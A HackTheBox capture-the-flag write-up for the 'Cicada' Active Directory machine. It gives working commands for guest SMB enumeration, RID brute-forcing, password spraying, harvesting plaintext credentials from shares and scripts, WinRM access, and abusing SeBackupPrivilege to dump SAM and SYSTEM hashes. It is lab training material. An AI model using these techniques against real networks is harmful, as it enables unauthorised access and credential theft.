Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Cicada (HTB – Easy)

This machine is an Active Directory environment where initial access is obtained through anonymous SMB access and password reuse. Multiple user accounts are chained until WinRM access is achieved. Privilege escalation relies on backup-related privileges to obtain local hashes and move to full compromise.

Overview

Target: 10.10.11.35
Domain: cicada.htb
Initial vector: guest SMB access → password disclosure
Privilege escalation: backup privileges to access SAM/SYSTEM

Enumeration

Anonymous SMB access:

$ smbmap -u guest -p "" -d . -H 10.10.11.35
Shares:
HR (READ ONLY)
DEV (NO ACCESS)
...

List and download from HR:

$ smbmap -u guest -p "" -d . -H 10.10.11.35 -r HR
$ smbmap -u guest -p "" -d . -H 10.10.11.35 --download 'HR\Notice from HR.txt'
-> Password: Cicada$M6Corpb*@Lp#nZp!8

User Enumeration

RID brute with guest:

$ nxc smb 10.10.11.35 -u "guest" -p '' --rid-brute
-> Users: john.smoulder, sarah.dantelia, michael.wrightson, david.orelious, emily.oscars, ...

Spray the recovered password:

$ nxc smb 10.10.11.35 -u Potential_Users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
-> Valid: michael.wrightson

Further enumeration with Michael:

$ enum4linux -a -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
-> description for david.orelious: "Just in case I forget my password is aRt$Lp#7t*VQ!3"

Access DEV share as David:

$ smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -d .
$ smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -r 'DEV'
$ smbmap --download 'DEV/Backup_script.ps1'

Backup_script.ps1 contains credentials:

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force

Foothold

WinRM access as Emily:

$ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X 'ipconfig'
$ evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

At this point, user access is obtained and user.txt can be read.

Privilege Escalation

Privilege enumeration (e.g. with winPEAS or manual checks) shows backup-related privileges such as SeBackupPrivilege.

Typical approach:

whoami /priv

With backup privileges, it is possible to read sensitive system files (SAM and SYSTEM) by abusing backup semantics. One common method is to copy or dump: 

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM

These files can be exfiltrated and processed offline (e.g. using impacket-secretsdump) to recover local administrator hashes, then reused for lateral movement or local admin access.

Conclusion

The machine chains weak information disclosure (HR share), password reuse, and embedded credentials in backup scripts to move across multiple users. Privilege escalation is achieved by abusing backup privileges to access protected system files and recover administrator credentials, resulting in full compromise.